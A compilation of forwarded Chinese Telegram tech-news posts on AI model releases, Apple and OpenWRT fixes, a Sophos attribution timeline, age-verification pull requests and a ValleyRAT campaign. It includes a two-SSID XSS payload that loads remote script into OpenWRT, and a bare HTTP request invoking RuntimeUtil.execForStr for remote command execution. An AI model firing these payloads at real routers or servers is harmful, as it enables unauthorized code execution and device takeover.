Forwarded from 科技圈🎗在花频道📮
MiniMax 发布新一代 Agent 大模型 M2.7,首次展示模型自我进化路径
3 月 18 日,MiniMax 稀宇科技发布新一代 Agent 旗舰大模型 M2.7,首次展示“模型自我进化”路径。该模型通过构建 Agent Harness 体系,据称能让模型深度参与自身训练与优化流程。公司称,在部分研发场景中,M2.7 可承担约 30%—50% 的工作量,并在内部评测集上实现约 30% 的效果提升。
在涵盖多种编程语言的 SWE-Pro 中,M2.7 以 56.22% 的正确率追平 GPT-5.3-Codex;在 Repo 级代码生成基准 VIBE-Pro 上,M2.7 得分 55.6%,几乎与 Opus 4.6 持平。
同花顺财经 | MiniMax 稀宇科技
🍀在花频道 🍵茶馆聊天 📮投稿
3 月 18 日,MiniMax 稀宇科技发布新一代 Agent 旗舰大模型 M2.7,首次展示“模型自我进化”路径。该模型通过构建 Agent Harness 体系,据称能让模型深度参与自身训练与优化流程。公司称,在部分研发场景中,M2.7 可承担约 30%—50% 的工作量,并在内部评测集上实现约 30% 的效果提升。
在涵盖多种编程语言的 SWE-Pro 中,M2.7 以 56.22% 的正确率追平 GPT-5.3-Codex;在 Repo 级代码生成基准 VIBE-Pro 上,M2.7 得分 55.6%,几乎与 Opus 4.6 持平。
同花顺财经 | MiniMax 稀宇科技
🍀在花频道 🍵茶馆聊天 📮投稿
Forwarded from 每日消费电子观察 (septs)
苹果推出 iOS 26.3.1(a) 等后台安全改进版更新 用于修复 WebKit 高危漏洞
https://www.landiannews.com/archives/112216.html
目前受支持的设备已经默认开启后台安全改进,所以系统会自动下载并安装更新,安装更新后不需要重启系统即可生效。
https://www.landiannews.com/archives/112216.html
目前受支持的设备已经默认开启后台安全改进,所以系统会自动下载并安装更新,安装更新后不需要重启系统即可生效。
Forwarded from Puddin的微信公众号订阅
Forwarded from 咕 Billchen 咕 🐱 抹茶芭菲批发中心 (billchenchina | 缩缩)
CVE-2026-32721, XSS fixed in OpenWRT 24.10.6 / 25.12.1
tldr:
SSID 1: <a id=s href=//domain/x.js>
SSID 2: <img src=x onerror=import(s)>
https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
tldr:
SSID 1: <a id=s href=//domain/x.js>
SSID 2: <img src=x onerror=import(s)>
https://mxsasha.eu/posts/openwrt-ssid-xss-to-root/
mxsasha.eu
Root from the parking lot: OpenWRT XSS through SSID scanning (CVE-2026-32721)
Lately, I’ve been experimenting with unusual XSS vectors. XSS (cross-site scripting) allows an attacker to execute arbitrary JavaScript in another …
Forwarded from [Patience Forever]
回过头又仔细看了下 Sophos 溯源关天峰。
2018年,Sophos 的印度子公司遭受了攻击,并被部署内核级(Netfilter)的 Rootkit.
2020年,Sophos X-Ops 团队主要通过:漏洞赏金和遥测信息追踪到 Gbigmao 位于四川无声科技。同时,还追踪到另一位于成都的电子科技大学背景的 TStark.
2021年,攻击者开始反制遥测系统,并被记录。
2022年,著名的 CVE-2022-1040 被一位自称来自日本的匿名研究人员提交,并拿到了2万美元赏金,但 Sophos 发现其 IP 地址位于中国,并且该漏洞在被提交给官方前,就已被用于实战攻击和此前相同的目标(西藏)。并且 Sophos 再次通过遥测和管理员帐户的电子邮件地址关联到一位中国攻击性安全研究员和 Linux shellcode 专家。
> 攻击者通过部署 JAVA 内存马,并用 LD_PRELOAD 注入 SSHD 实现持久化,同时还会窃取管理员面板登录密码。在 CVE-2022-3236 中使用了 Perl 作为持久化。
防火墙/杀毒软件能够通过遥测精准锁定个人终端,获取设备上的文件,甚至能通过定向推送更新远控设备。
Sophos 如何标记需要远控的设备?频繁电源循环,固件回滚,免费网络邮箱,大量设备运行着不同且频繁更新的固件版本,LAN口连接的设备数量极少,WAN口使用私有 IP 地址并通过其他设备中转。此外,其他行为也可能触发告警:
(1)异常系统命令:向临时目录写入和执行文件,运行自带黑客工具(masscan),使用 vim 直接编辑并运行脚本,flashrom和dd等命令
(2)异常数据库字段
(3)反常外连
参考:
Pacific Rim timeline: Information for defenders from a braid of interlocking attack campaigns
‘Cloud Snooper’ Attack Bypasses Firewall Security Measures
Inside a Firewall Vendor's 5-Year War With the Chinese Hackers Hijacking Its Devices
2018年,Sophos 的印度子公司遭受了攻击,并被部署内核级(Netfilter)的 Rootkit.
2020年,Sophos X-Ops 团队主要通过:漏洞赏金和遥测信息追踪到 Gbigmao 位于四川无声科技。同时,还追踪到另一位于成都的电子科技大学背景的 TStark.
2021年,攻击者开始反制遥测系统,并被记录。
2022年,著名的 CVE-2022-1040 被一位自称来自日本的匿名研究人员提交,并拿到了2万美元赏金,但 Sophos 发现其 IP 地址位于中国,并且该漏洞在被提交给官方前,就已被用于实战攻击和此前相同的目标(西藏)。并且 Sophos 再次通过遥测和管理员帐户的电子邮件地址关联到一位中国攻击性安全研究员和 Linux shellcode 专家。
> 攻击者通过部署 JAVA 内存马,并用 LD_PRELOAD 注入 SSHD 实现持久化,同时还会窃取管理员面板登录密码。在 CVE-2022-3236 中使用了 Perl 作为持久化。
防火墙/杀毒软件能够通过遥测精准锁定个人终端,获取设备上的文件,甚至能通过定向推送更新远控设备。
Sophos 如何标记需要远控的设备?频繁电源循环,固件回滚,免费网络邮箱,大量设备运行着不同且频繁更新的固件版本,LAN口连接的设备数量极少,WAN口使用私有 IP 地址并通过其他设备中转。此外,其他行为也可能触发告警:
(1)异常系统命令:向临时目录写入和执行文件,运行自带黑客工具(masscan),使用 vim 直接编辑并运行脚本,flashrom和dd等命令
(2)异常数据库字段
(3)反常外连
参考:
Pacific Rim timeline: Information for defenders from a braid of interlocking attack campaigns
‘Cloud Snooper’ Attack Bypasses Firewall Security Measures
Inside a Firewall Vendor's 5-Year War With the Chinese Hackers Hijacking Its Devices
Sophos
Pacific Rim timeline: Information for defenders from a braid of interlocking attack campaigns
Sophos X-Ops unveils five-year investigation tracking China-based groups targeting perimeter devices
Forwarded from K4YT3X's Channel (K4YT3X)
有这么个伄人 dylanmtaylor 在到处开 PR 给个个 Linux 系统加出生日期的支持,甚至 systemd 已经 merge 了,不知道这人是不是 Facebook 或者什么政府的人
https://github.com/systemd/systemd/pull/40954
https://github.com/archlinux/archinstall/pull/4290
https://github.com/canonical/ubuntu-desktop-provision/pull/1338
我还没看到 Arch 的讨论,如果有的话我也得说两句,但是我本人坚决反对给 OS 加 censorship;California 用户想用可以去自己 fork 每一个 distro,为自己州通过的**法律买单
要保证你家孩子不看你不想他看的东西你可以设置 parental control 和 family DNS,一点时间都没有的话那就别生
一个二个都要上传 ID 验证年龄,真的看得我血压高
最近相关的负面消息太多了,我可能考虑写一篇 blog 详细讨论一下这个问题,但是在这个问题平息之前我会不断表明立场、游说身边的人反对法案,和开发类似 conclave 的项目对抗这些侵犯隐私的法律和措施
https://github.com/systemd/systemd/pull/40954
https://github.com/archlinux/archinstall/pull/4290
https://github.com/canonical/ubuntu-desktop-provision/pull/1338
我还没看到 Arch 的讨论,如果有的话我也得说两句,但是我本人坚决反对给 OS 加 censorship;California 用户想用可以去自己 fork 每一个 distro,为自己州通过的**法律买单
要保证你家孩子不看你不想他看的东西你可以设置 parental control 和 family DNS,一点时间都没有的话那就别生
一个二个都要上传 ID 验证年龄,真的看得我血压高
最近相关的负面消息太多了,我可能考虑写一篇 blog 详细讨论一下这个问题,但是在这个问题平息之前我会不断表明立场、游说身边的人反对法案,和开发类似 conclave 的项目对抗这些侵犯隐私的法律和措施
❤5
cursor基于kimi k2.5微调模型且没有注明,被发现了还在顾左右而言他
结果kimi今天凌晨帮他们官宣了
https://x.com/leerob/status/2035035355364081694
https://x.com/Kimi_Moonshot/status/2035074972943831491
结果kimi今天凌晨帮他们官宣了
https://x.com/leerob/status/2035035355364081694
https://x.com/Kimi_Moonshot/status/2035074972943831491
🧵 Thread • FixupX
Lee Robinson (@leerob)
Yep, Composer 2 started from an open-source base! We will do full pretraining in the future.
Only ~1/4 of the compute spent on the final model came from the base, the rest is from our training. This is why evals are very different.
And yes, we are following…
Only ~1/4 of the compute spent on the final model came from the base, the rest is from our training. This is why evals are very different.
And yes, we are following…
还有一个疑点是cursor好像直接拿到了base模型进行训练,kimi也同时确认了他们有授权
cursor连授权都拿到了却连提一嘴kimi都不愿意,能骗得了谁
cursor连授权都拿到了却连提一嘴kimi都不愿意,能骗得了谁
Forwarded from Eternal_安全内参
POST /papi/esearch/data/devops/dubboApi/debug/method?interfaceName=cn.hutool.core.util.RuntimeUtil&methodName=execForStr HTTP/1.1
Host:
Content-Type: application/json
Content-Length: 14
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
[["whoami"]]
Forwarded from LoopDNS资讯播报
银狐木马疑似在 Telegram 不同主题群组中批量传播
近期,我们持续接收到多份来自 Telegram 群组场景的可疑样本。尽管这些样本在文件命名、内容伪装和社工主题上各不相同,但其执行链、下载逻辑、侧载方式、持久化痕迹及通信配置高度一致,显示出明显的工程化投递特征。结合投稿来源和样本比对结果研判,这是一轮疑似由银狐相关团伙面向不同主题 Telegram 群组实施的批量化定向投递活动。本文将围绕该批样本的攻击流程、持久化机制、网络伪装与家族指纹展开分析,并结合 Winos4 / ValleyRAT 特征进行关联研判,为安全防护与事件响应提供参考。
阅读全文
近期,我们持续接收到多份来自 Telegram 群组场景的可疑样本。尽管这些样本在文件命名、内容伪装和社工主题上各不相同,但其执行链、下载逻辑、侧载方式、持久化痕迹及通信配置高度一致,显示出明显的工程化投递特征。结合投稿来源和样本比对结果研判,这是一轮疑似由银狐相关团伙面向不同主题 Telegram 群组实施的批量化定向投递活动。本文将围绕该批样本的攻击流程、持久化机制、网络伪装与家族指纹展开分析,并结合 Winos4 / ValleyRAT 特征进行关联研判,为安全防护与事件响应提供参考。
阅读全文
Telegraph
疑似银狐针对不同主题 Telegram 群组实施批量化社工投递的 Winos4/ValleyRAT 木马活动分析
概述 近期,我们频道的技术团队连续接到多起可疑样本投稿。投稿样本虽然在外层文件命名、文件内容伪装和社工主题上存在差异,但在执行链、下载逻辑、落地路径、侧载方式和通信配置上表现出高度一致性。结合投稿来源信息研判,这批样本并非针对单一场景投放,而是疑似由同一黑产团伙根据不同群组主题进行批量定制分发。 现有线索显示,相关样本主要来自不同类型的 Telegram 聊天群、资源分享群和垂直兴趣群。攻击者疑似先批量获取目标群组并加入,再依据群组内容方向调整诱饵名称和文件包装形式,例如围绕影视资源、软件下载、工具分享…
Forwarded from 蓝点网订阅频道
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM